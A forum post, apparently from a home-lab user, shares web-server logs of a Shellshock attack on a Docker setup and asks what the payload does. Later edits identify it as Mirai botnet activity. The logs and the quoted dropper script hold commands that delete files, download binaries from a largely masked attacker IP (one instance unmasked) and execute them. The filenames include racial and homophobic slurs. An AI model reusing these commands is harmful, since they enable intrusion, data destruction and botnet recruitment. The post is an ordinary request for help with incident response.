nginx-1     | 50.116.48.10 - - [11/Feb/2024:18:41:09  0000] "GET / HTTP/1.1" 200 310 "-" "Go-http-client/1.1"
frontend-1  | 172.22.0.5 - - [11/Feb/2024:18:52:58  0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 454 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.*.*.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'" "-" nginx-1     | 185.224.128.10 - - [11/Feb/2024:18:52:58  0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 454 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.*.*.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'"

​

Meanwhile, the contents of this n*****.sh a file...

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol http://192.*.*.183/mips; chmod x lol; ./lol sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao http://192.*.*.183/mpsl; chmod x lmao; ./lmao sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O faggot http://192.*.*.183/x86_64; chmod x faggot; ./faggot sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O gay http://192.*.*.183/nigga.sh/arm; chmod x gay; ./gay sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O retard http://192.*.*.183/arm5; chmod x retard; ./retard sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigger http://192.*.*.183/arm6; chmod x nigger; ./nigger sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O shit http://192.*.*.183/arm7; chmod x shit; ./shit sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigga http://192.*.*.183/i586; chmod x nigga; ./nigga sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw http://192.*.*.183/i686; chmod x kekw; ./kekw sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what http://192.*.*.183/powerpc; chmod x what; ./what sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys http://192.*.*.183/sh4; chmod x kys; ./kys sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O shiteater http://192.3.152.183/m68k; chmod x shiteater; ./shiteater sonic cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O blyat http://192.*.*.183/sparc; chmod x blyat; ./blyat sonic

Does anyone know what these executable files do? Given the foul language in their script I assume this is a kid. Also, is it normal for this stuff to occur within literally 30 minutes of opening the DMZ of my home firewall? I've hosted things in the cloud (Linode) for years without anything like this showing up in my logs. These docker containers are on their own walled off VLAN, so I don't think there's too much damage the attacker could cause. I hope.If there's a more appropriate sub for this post please let me know.

​

EDIT: This was not some kid. I couldn't have been more wrong, as It appears to be Marai botnet.

EDIT2: Defanged the URLs per the comments. Apologies for leaving it up like that for so long, I really hope nobody clicked them. I'm an idiot and was reading all the comments as "defanjed" and was super confused. But 19 hours later I was able to rub two brain cells together and realize what everyone was asking.